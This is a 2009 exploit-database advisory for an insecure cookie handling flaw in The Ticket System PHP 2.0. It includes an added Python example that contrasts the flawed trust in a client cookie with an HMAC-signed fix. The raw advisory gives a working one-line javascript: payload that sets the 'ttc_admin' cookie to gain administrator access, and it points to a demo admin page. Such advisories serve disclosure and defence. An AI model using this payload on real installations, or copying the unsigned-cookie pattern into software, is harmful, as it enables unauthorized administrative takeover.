Vendor: The Ticket System PHP
By: TiGeR-Dz
CVSS: 7.5 (HIGH)
Vulnerability: Insecure Cookie Handling
CWE: 614
Product Name: The Ticket System PHP
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mrcgiguy:the_ticket_system_php
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

The Ticket System / The Ticket System PHP Version 2.0 Insecure Cookie Handling Vulnerability

The Ticket System / The Ticket System PHP Version 2.0 handles cookies insecurely. An attacker can exploit this by setting the cookie 'ttc_admin=1%7Cadmin;path=/', which gives the attacker administrative access to the application.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used in the application.
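
The following is an added example, not code from the product or from the original advisory. It contrasts a hypothetical model of the flaw (the role is read directly from the client-supplied `ttc_admin` value) with a cookie that carries a server-side HMAC tag; the function names, the `flag|user|tag` layout and the key handling are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import unquote

# Assumption: a server-side secret, generated once and never sent to the client.
SECRET_KEY = secrets.token_bytes(32)


def naive_is_admin(cookie_value):
    """Hypothetical model of the flaw: the admin flag is trusted as received."""
    parts = unquote(cookie_value).split("|")
    return len(parts) == 2 and parts[0] == "1"


def _tag(payload, key):
    """HMAC-SHA256 over the cookie payload, hex encoded."""
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user, is_admin, key=SECRET_KEY):
    """Called only after a successful login; returns 'flag|user|tag'."""
    payload = f"{int(is_admin)}|{user}"
    return f"{payload}|{_tag(payload, key)}"


def verified_is_admin(cookie_value, key=SECRET_KEY):
    """Honour the admin flag only when the tag matches; reject malformed input."""
    parts = unquote(cookie_value).split("|")
    if len(parts) != 3:
        return False
    flag, user, tag = parts
    expected = _tag(f"{flag}|{user}", key)
    # Constant-time comparison on bytes avoids timing leaks and type errors.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False
    return flag == "1"
```

Keeping only a random session identifier in the cookie and storing the role on the server removes the need to put the role in the cookie at all.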

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
The Ticket System / The Ticket System PHP Version 2.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:The Ticket System / The Ticket System PHP Version 2.0
Download:http://www.mrcgiguy.com/the_ticket_system.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="ttc_admin=1%7Cadmin;path=/";
----------------------------------------------------------------
Dem0
----
http://www.mrcgiguy.com/cgi-bin/tts-demo/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]